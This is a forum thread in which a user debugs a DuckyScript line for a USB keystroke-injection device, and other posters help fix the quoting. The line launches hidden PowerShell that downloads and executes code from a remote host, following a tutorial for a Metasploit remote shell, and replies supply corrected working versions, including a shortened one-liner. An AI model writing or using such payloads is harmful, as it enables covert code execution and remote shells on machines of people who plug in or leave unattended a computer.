Jump to content

Stuck with simple DuckyScript


rizzah
 Share

Recommended Posts

Hi, im testing something with my BB and i got stuck on a duckyscript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

To my opinion this should be ok, however when executed this is what he types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out?

Link to comment
Share on other sites

With the v1.1 firmware, you should now be able to use 'RUN WIN powershell.....".

If you are not wanting to put the duckyscript in a separate file, which is generally recommended when you have more than a few lines, I would create a payload that opens notepad and types a few lines to see where you are having issues. Keep in mind that the STRING you are printing is interpreted by BASH prior to being fed to the HID device.

First guess without trying anything is that you don't need to escape the single quote after 'downloadstring'

Link to comment
Share on other sites

@LowValueTarget Thanks for your reply. I tried it with WIN RUN powershell. Results where the same.

I'm trying to create the same thing as on this page: https://cyberarms.wordpress.com/2017/03/27/bash-bunny-windows-remote-shell-using-metasploit-powershell/

Everything seems to work fine, cept for the powershell line he enters in the 'run' field. i tried with or without escaping the single quote, that did not make a difference. When i remove the single quote he pastes the while line just fine. So it does seem the problem is with the single quote, question is why it doesnt get escaped properly. It did seem to work in the tutorial i pasted above and also on some online video i seen. 

Link to comment
Share on other sites

I think its cause : \(\’http://192.168.145.138/ztgBcA7n\'\)\; 

the first one isn't a single quote but a curly apostrophe and the ending is a single quote.

and there is no definition for the curly apostrophe ’ in your language.json file.

 

Edited by elkentaro
  • Upvote 1
Link to comment
Share on other sites

  • 4 weeks later...
On 4/14/2017 at 6:26 AM, rizzah said:

Hi, im testing something with my BB and i got stuck on a duckyscript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

To my opinion this should be ok, however when executed this is what he types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out?

Or you can enclose you whole string command in double quotes and then you only have to escape "&"s and other double quotes you want to show up.

Q STRING "powershell.exe -nop -w hidden -c \"\$H=new-object net.webclient;IEX \$H.downloadstring('http://192.168.145.138/ztgBcA7n\');\""
or shortened....
Q STRING "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\""

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...